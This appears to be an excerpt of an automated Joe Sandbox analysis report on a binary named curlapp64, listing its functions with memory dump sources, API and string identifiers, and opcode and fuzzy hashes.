                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                • API String ID: 909987262-435359029
                                                                                                                                • Opcode ID: 642a8238d151c4605239283559881541d420088661b931672251598b2cba6790
                                                                                                                                • Instruction ID: 0471f661c3c422a46537452c5e6e24c651a538c8a13daec70e6895aeed7b50d3
                                                                                                                                • Opcode Fuzzy Hash: 642a8238d151c4605239283559881541d420088661b931672251598b2cba6790
                                                                                                                                • Instruction Fuzzy Hash: 9E41B532E0858685DA549F28F4602B923B1FF52746F944172E7DE836E9DF2CE591C740
                                                                                                                                Function 00007FF6CABD3BD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 108COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                • API String ID: 909987262-435359029
                                                                                                                                • Opcode ID: bc76b05ba397fed6e1359d1205a953b518802d55c4f0041b205f2babdd8f0f63
                                                                                                                                • Instruction ID: f93e44c38238689250a0c91e27ca40b680777cbee6c0f5313e34601d4378a082
                                                                                                                                • Opcode Fuzzy Hash: bc76b05ba397fed6e1359d1205a953b518802d55c4f0041b205f2babdd8f0f63
                                                                                                                                • Instruction Fuzzy Hash: 7541A522E0C98A86EA158F18F0B12B963B1EF52746F544172D7ED835EADF2CE595C700
                                                                                                                                Function 00007FF8BA245340 Relevance: 16.7, APIs: 11, Instructions: 179COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$_lseeki64mallocwcstombs$__stdio_common_vsprintf_open_wopen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1856395618-0
                                                                                                                                • Opcode ID: f60c49f5dcef5d14e5ae0bf2741802d50be5dafa20a35e074c88c31dceb54001
                                                                                                                                • Instruction ID: ea7dbb3d63c5c9efa6ec089c662f5e29fe82bc14203051625b945b9de03da641
                                                                                                                                • Opcode Fuzzy Hash: f60c49f5dcef5d14e5ae0bf2741802d50be5dafa20a35e074c88c31dceb54001
                                                                                                                                • Instruction Fuzzy Hash: 9F716E72A0864386EB649F2994441393AA2FB84FE4F540275CFAE876D8DF3DDC55EB00
                                                                                                                                Function 00007FF6CABD6530 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 157COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                • String ID: bad locale name$false$true
                                                                                                                                • API String ID: 4121308752-1062449267
                                                                                                                                • Opcode ID: a6b038fd9b20093d5a44b931743a8a7475515f91206f559108f24990fee8ea96
                                                                                                                                • Instruction ID: 852b0d36c3736e8b6242e6d381ba949c6a5386fb958b2732c81d7280f12a6210
                                                                                                                                • Opcode Fuzzy Hash: a6b038fd9b20093d5a44b931743a8a7475515f91206f559108f24990fee8ea96
                                                                                                                                • Instruction Fuzzy Hash: 78614036F1AB4289FB15DFB0A4703BC23B1AF45709F0405B4DE8DA7A9ADE38A456C354
                                                                                                                                Function 00007FF8A9367A02 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 142COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: SimpleString::operator=_vfwprintf_lfree
                                                                                                                                • String ID: %s: %s$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$GMT$Signature
                                                                                                                                • API String ID: 3487055449-2552702830
                                                                                                                                • Opcode ID: bfe3d58aac4f4dcc49a8bbc369ae4813fab6ed080f2de01cece9aa41832182d1
                                                                                                                                • Instruction ID: a173774af64ecc71d8d839a4f571d0e14ef72908615d499708c5ed2a8d2084b9
                                                                                                                                • Opcode Fuzzy Hash: bfe3d58aac4f4dcc49a8bbc369ae4813fab6ed080f2de01cece9aa41832182d1
                                                                                                                                • Instruction Fuzzy Hash: 5D519266B0EFC261EB20DF65E4542BAA7B2EB447C8F846031DA4E97659EF3CE545C300
                                                                                                                                Function 00007FF8BA24DAC0 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190073905-0
                                                                                                                                • Opcode ID: 3ff9b8e8d4e4d987ff99c83a879715d8304c9a3c2ceeeb745bce6cd9f66a06e2
                                                                                                                                • Instruction ID: 9758c49fcc30f833b7eefa31ed46cb4709f8f3781165f3372ae62fb74e2ac556
                                                                                                                                • Opcode Fuzzy Hash: 3ff9b8e8d4e4d987ff99c83a879715d8304c9a3c2ceeeb745bce6cd9f66a06e2
                                                                                                                                • Instruction Fuzzy Hash: 6181BF21F0C64386FB64AB6E94412B962A1AF85FC0F4880F5EF0D87796DE7CF945A700
                                                                                                                                Function 00007FF8BA245200 Relevance: 15.1, APIs: 10, Instructions: 108COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$_close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3165389682-0
                                                                                                                                • Opcode ID: 8cde90166b2398b283f0e54bdcdeead90dbafe5d92020d39cf43bc81dab7b3a2
                                                                                                                                • Instruction ID: 6aabfdcdfa063fa29e320de011b7419d36166baaf1eee507836d63bf1e2ed216
                                                                                                                                • Opcode Fuzzy Hash: 8cde90166b2398b283f0e54bdcdeead90dbafe5d92020d39cf43bc81dab7b3a2
                                                                                                                                • Instruction Fuzzy Hash: 4C412132A1854287EB649B3DE45423962A1FFC4FA4F541271EF6E42AE8CE3DD8469600
                                                                                                                                Function 00007FF6CABB6180 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 347COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: "$Answer$data$https://dns.google/resolve?name={}
                                                                                                                                • API String ID: 3668304517-82038468
                                                                                                                                • Opcode ID: de9983a38ebab8ff04809f22c24380c88103d7e2821306ec5e875a17c502920b
                                                                                                                                • Instruction ID: 09e3860d4342eac4a0c21cde1e4935e85caa19ee8cdc4a366e3ff2a3aa9fc6f6
                                                                                                                                • Opcode Fuzzy Hash: de9983a38ebab8ff04809f22c24380c88103d7e2821306ec5e875a17c502920b
                                                                                                                                • Instruction Fuzzy Hash: 90E19272A18BC681EA209F25F4B03EE6361FB86795F405271DADD83A96DF7CD885C700
                                                                                                                                Function 00007FF6CABB4C60 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: curl_easy_init$curl_easy_cleanup
                                                                                                                                • String ID: CURL could not be initialized download_json$CURL could not be re-initialized download_json
                                                                                                                                • API String ID: 2458899574-2962405094
                                                                                                                                • Opcode ID: 45d67a3488c91eb043ddc74514686c5712c44494333c84a48ba91fd53bb45306
                                                                                                                                • Instruction ID: c8a157bf09e24f1fb35a2ecf4ffbfeba11b402c9e9f256d148c23e071d926dab
                                                                                                                                • Opcode Fuzzy Hash: 45d67a3488c91eb043ddc74514686c5712c44494333c84a48ba91fd53bb45306
                                                                                                                                • Instruction Fuzzy Hash: 0BA1AF72A08B8185EB109F65F4A03AD6BA0FB86795F504375EADD87B95EF3CE590C300
                                                                                                                                Function 00007FF6CABDCC70 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 140COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big
                                                                                                                                • API String ID: 909987262-180087107
                                                                                                                                • Opcode ID: 7d7aeedf4cb3237edec35eae6c4b2a75e7facbbbcb7e6c785a36e9f799910acc
                                                                                                                                • Instruction ID: ad11a494e9509af75175e399211f95fc59a2630a54e543e04a8499283a2acd80
                                                                                                                                • Opcode Fuzzy Hash: 7d7aeedf4cb3237edec35eae6c4b2a75e7facbbbcb7e6c785a36e9f799910acc
                                                                                                                                • Instruction Fuzzy Hash: FB519262E0854682EB249F28F0601BD6360FF53B9AF944172DBDE826D9EF2CF591C740
                                                                                                                                Function 00007FF6CABD2010 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 136COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big
                                                                                                                                • API String ID: 909987262-180087107
                                                                                                                                • Opcode ID: 5af9ae905e1eaa496e73f90bca387dcf238ee655075c3ae96b7f78e78d35d6de
                                                                                                                                • Instruction ID: ec2627d0e50e73c18d8313d32d8e1f33f32829c72c57d0c1e2f770873f7dcfe5
                                                                                                                                • Opcode Fuzzy Hash: 5af9ae905e1eaa496e73f90bca387dcf238ee655075c3ae96b7f78e78d35d6de
                                                                                                                                • Instruction Fuzzy Hash: 3051C232E0C98685EB158F28E0602B87771FF53B46F548175D7EE822D9EE2CE586D600
                                                                                                                                Function 00007FF6CABE36E0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 21libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                • API String ID: 667068680-1247241052
                                                                                                                                • Opcode ID: 8f1dabe6bbf128b779a5ac82c94236a7cc606a5a8d2a655be2aee59edd3a0333
                                                                                                                                • Instruction ID: e049cb5ce4d48d30fedf435ee73baad721a195efdf249c9770e57e3c2123fdb0
                                                                                                                                • Opcode Fuzzy Hash: 8f1dabe6bbf128b779a5ac82c94236a7cc606a5a8d2a655be2aee59edd3a0333
                                                                                                                                • Instruction Fuzzy Hash: 66F0DA74A09B0381EE009FA1F8A91702370BB68742B4151B5CA8DC2320EE7DA099D300
                                                                                                                                Function 00007FF8BA246050 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 117COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8BA245F47), ref: 00007FF8BA246077
                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8BA245F47), ref: 00007FF8BA246087
                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8BA245F47), ref: 00007FF8BA2460EA
                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8BA245F47), ref: 00007FF8BA2460F4
                                                                                                                                  • Part of subcall function 00007FF8BA245230: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BA24525D
                                                                                                                                  • Part of subcall function 00007FF8BA245230: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BA2452C0
                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8BA245F47), ref: 00007FF8BA246129
                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8BA245F47), ref: 00007FF8BA246133
                                                                                                                                • memmove.VCRUNTIME140(?,?,?,00007FF8BA245F47), ref: 00007FF8BA2461EB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$malloc$memmove
                                                                                                                                • String ID: 1.3.1$out of memory
                                                                                                                                • API String ID: 2623842526-361156306
                                                                                                                                • Opcode ID: b35b446a4dc455d582adfb2a798707482938eb642aba472980352d661cf5840a
                                                                                                                                • Instruction ID: 398274ac3e6f4d4ee55f67206092e75a65de620a9d9afb27a6a6c6c90bfec84e
                                                                                                                                • Opcode Fuzzy Hash: b35b446a4dc455d582adfb2a798707482938eb642aba472980352d661cf5840a
                                                                                                                                • Instruction Fuzzy Hash: DF51AE32A1869286E750CF29E54026C37A0FB88FD8F045276EF5D47799CF38E895D700
                                                                                                                                Function 00007FF6CABE69B0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                • Opcode ID: c987dc07aa77382b82d933b9bd73357070bbf54a8ef333fe3d2b907b2246b907
                                                                                                                                • Instruction ID: 56d9f9b5ec5a949a7bff5a1886b982b7ea5852656c8bd804a80899a2be036f82
                                                                                                                                • Opcode Fuzzy Hash: c987dc07aa77382b82d933b9bd73357070bbf54a8ef333fe3d2b907b2246b907
                                                                                                                                • Instruction Fuzzy Hash: ABD1833290878286EB20DF65E5603AD77A0FB56799F1042B5EECD97B95CF38E490C780
                                                                                                                                Function 00007FF6CABE1370 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 177COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                • String ID: bad locale name$false$true
                                                                                                                                • API String ID: 3230409043-1062449267
                                                                                                                                • Opcode ID: 598a93e3e168cd54211d936885fd64af63daf99834e5f7f70888c9f4ce7b4bec
                                                                                                                                • Instruction ID: d66435a0413c5737ee6c3afd47a4241c003481c9f96d05d72e0420a0a04ff09f
                                                                                                                                • Opcode Fuzzy Hash: 598a93e3e168cd54211d936885fd64af63daf99834e5f7f70888c9f4ce7b4bec
                                                                                                                                • Instruction Fuzzy Hash: C0815C32A29B8189EB00DF60E4A02AD77B0FF95744F5411B5EACDA7A69DF38D491C780
                                                                                                                                Function 00007FF6CABB4020 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 167COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: at line $, column $>
                                                                                                                                • API String ID: 0-1466611262
                                                                                                                                • Opcode ID: cff93c34664bbef36832d4fde2d669a555cfac1a9def6137c8e9bf10f9397447
                                                                                                                                • Instruction ID: d0861e52c5eee879eee84fe7ad7c7995942fdb4c2598b1f3a0aae560e1fcf4d9
                                                                                                                                • Opcode Fuzzy Hash: cff93c34664bbef36832d4fde2d669a555cfac1a9def6137c8e9bf10f9397447
                                                                                                                                • Instruction Fuzzy Hash: 1861E372A18B8581EA10DF25F4603AEA761FB86BD1F404271EB9D43B9ADF3CD541C700
                                                                                                                                Function 00007FF8BA246A00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
